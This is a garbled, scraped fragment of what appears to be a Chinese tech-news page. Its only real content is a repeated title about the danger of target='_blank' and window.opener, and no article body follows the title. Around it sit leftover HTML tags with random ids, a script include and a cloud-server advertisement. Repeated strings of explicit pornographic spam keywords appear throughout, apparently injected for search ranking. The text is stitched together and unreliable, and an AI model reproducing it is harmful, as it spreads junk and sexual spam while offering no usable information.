id="0wmea"><dd id="0wmea"><th id="0wmea"></th></dd></button><del id="0wmea"></del><rt id="0wmea"><tbody id="0wmea"><em id="0wmea"></em></tbody></rt><tbody id="0wmea"></tbody><button id="0wmea"></button><center id="0wmea"></center><del id="0wmea"></del><ul id="0wmea"><sup id="0wmea"><center id="0wmea"></center></sup></ul><strike id="0wmea"></strike><dl id="0wmea"><optgroup id="0wmea"><abbr id="0wmea"></abbr></optgroup></dl><strong id="0wmea"><optgroup id="0wmea"><ul id="0wmea"></ul></optgroup></strong><acronym id="0wmea"><xmp id="0wmea"><fieldset id="0wmea"></fieldset></xmp></acronym><rt id="0wmea"></rt><li id="0wmea"></li><blockquote id="0wmea"></blockquote><noscript id="0wmea"></noscript><abbr id="0wmea"></abbr><strong id="0wmea"><noframes id="0wmea"><ul id="0wmea"></ul></noframes></strong><center id="0wmea"></center><input id="0wmea"></input><delect id="0wmea"></delect><abbr id="0wmea"><delect id="0wmea"><tr id="0wmea"></tr></delect></abbr><delect id="0wmea"></delect><code id="0wmea"></code></div> <script src="http://systransis.cn/yun/static/theme/ukd/js/common.js"></script> <<script type="text/javascript"> $(".site-seo-depict *,.site-content-answer-body *,.site-body-depict *").css("max-width","100%"); </script> </html>

成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專欄INFORMATION COLUMN

上云采購季！| 2核2G4M爆款云服務(wù)器低至59元/年，更有多臺、長期優(yōu)惠，快來選購！

你不曾察覺的隱患：危險(xiǎn)的 target="_blank" 與 “opener”

成人国产在线小视频_日韩寡妇人妻调教在线播放_色成人www永久在线观看_2018国产精品久久_亚洲欧美高清在线30p_亚洲少妇综合一区_黄色在线播放国产_亚洲另类技巧小说校园_国产主播xx日韩_a级毛片在线免费

資訊專欄INFORMATION COLUMN

上云采購季！| 2核2G4M爆款云服務(wù)器低至59元/年，更有多臺、長期優(yōu)惠，快來選購！

你不曾察覺的隱患：危險(xiǎn)的 target="_blank" 與 “opener”

上云采購季！| 2核2G4M爆款云服務(wù)器低至59元/年，更有多臺、長期優(yōu)惠，快來選購！